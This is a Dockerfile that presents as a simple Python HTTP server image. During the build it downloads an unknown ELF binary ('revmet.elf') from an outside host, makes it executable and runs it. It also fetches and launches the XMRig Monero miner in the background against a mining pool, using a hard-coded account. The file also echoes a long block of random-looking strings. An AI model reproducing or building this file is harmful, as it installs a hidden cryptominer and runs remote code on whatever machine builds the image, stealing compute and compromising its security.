FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo HKPzPTwGzGXcLjNygaiC0ieDyUOk3HSu B8X0xulZvBsFjqIz30POsXXa7iH2PvcY sAPw21DSJVpuUyxRetcGIeoSNoUEfBNx BIjDvjc3zSNn5hlRFtEBhpTOxKLB96a2 ZSdCfXjUypH9rPuCUuVaG0bsIzPA2Qac 1pxVSr2CKqS0ESWMJT2tWTnWjRW7QqH0 5QIpA28E7SXWMXqbbbwwkf31WF3ZdIWR acJfK5YMpz5GhV1XtZOXdcYYm8PqaRSJ szmYRlv95WMNsMsOnvsUzkT5EpuLw3mj bznAhy2SE3LYdRrRjGmDgkZRP1tN46qg ffWNmA7yy8Dtke3PT033Lefc02un2giM M8DN7xTuiw7tMT8cEkFX313QerxlBFBt Je4RWJPXPZnkhUQZukpWn65XoRN0ad6g xpSVdSixEubSstzJANf8kv2fXpxIegN9 RtHIjy5sh7GmMTxH28chF00Pjp5OhDji DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]